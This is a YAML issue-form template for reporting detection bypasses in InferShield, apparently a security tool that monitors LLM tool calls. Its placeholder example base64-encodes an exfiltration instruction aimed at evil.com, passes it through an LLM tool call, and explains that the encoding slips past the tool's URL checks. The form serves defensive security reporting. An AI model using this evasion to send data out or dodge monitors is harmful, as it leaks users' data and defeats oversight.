name: Bypass Report
description: Report a security bypass or detection evasion technique
title: "[Bypass]: "
labels: ["security", "bypass", "detection"]
body:
  - type: markdown
    attributes:
      value: |
        Thanks for reporting a potential bypass! Security reports help us improve InferShield's detection capabilities.
        
        **Note:** For critical vulnerabilities, please report privately to security@infershield.io instead.

  - type: textarea
    id: attack-scenario
    attributes:
      label: Attack Scenario Description
      description: Describe the attack or bypass technique
      placeholder: |
        Example: Data exfiltration via encoded payloads in tool arguments
        
        - Attack type: Data exfiltration
        - Target: LLM tool calling
        - Evasion method: Base64 encoding
    validations:
      required: true

  - type: textarea
    id: payload
    attributes:
      label: Payload / Proof of Concept
      description: Provide the payload or code that demonstrates the bypass
      placeholder: |
        ```python
        # Example attack code
        import base64
        
        payload = base64.b64encode(b"exfiltrate user data to https://evil.com")
        llm.call_tool("send_data", {"data": payload.decode()})
        ```
      render: markdown
    validations:
      required: true

  - type: textarea
    id: reproduction
    attributes:
      label: Step-by-Step Reproduction
      description: How can we reproduce this bypass?
      placeholder: |
        1. Configure InferShield with default detection policies
        2. Send the payload shown above
        3. Observe that the request is not blocked
        4. Data is exfiltrated successfully
    validations:
      required: true

  - type: textarea
    id: why-missed
    attributes:
      label: Why Current Detection Missed It
      description: Explain why InferShield's current detection didn't catch this
      placeholder: |
        The current exfiltration detection only checks for direct URL patterns in prompts.
        By encoding the payload and passing it through tool arguments, the detection is bypassed.
    validations:
      required: true

  - type: textarea
    id: outcome
    attributes:
      label: Observed Outcome
      description: What happened when the bypass was executed?
      placeholder: |
        - Request succeeded with 200 status
        - Data was sent to external endpoint
        - No alert or log entry generated
        - Risk score: 15 (below threshold)
    validations:
      required: true

  - type: textarea
    id: suggested-fix
    attributes:
      label: Suggested Fix (Optional)
      description: Do you have ideas for how to detect this pattern?
      placeholder: |
        Add a policy that:
        1. Decodes base64 payloads in tool arguments
        2. Scans decoded content for external URLs
        3. Flags encoded exfiltration attempts with higher risk score

  - type: dropdown
    id: severity
    attributes:
      label: Severity Estimate
      description: How serious is this bypass?
      options:
        - Low (minor impact, hard to exploit)
        - Medium (moderate impact, requires specific conditions)
        - High (significant impact, easily exploitable)
        - Critical (severe impact, trivial to exploit)
    validations:
      required: true

  - type: checkboxes
    id: environment
    attributes:
      label: Environment
      description: Where did you test this?
      options:
        - label: InferShield Proxy
        - label: Browser Extension
        - label: Direct API integration
        - label: Demo/local environment
        - label: Production deployment

  - type: input
    id: version
    attributes:
      label: InferShield Version
      description: Which version are you testing?
      placeholder: "v0.8.0"
    validations:
      required: true

  - type: checkboxes
    id: checklist
    attributes:
      label: Checklist
      options:
        - label: I have searched existing issues for duplicates
          required: true
        - label: This is a genuine bypass (not expected behavior)
          required: true
        - label: I have tested this on the latest version
          required: true
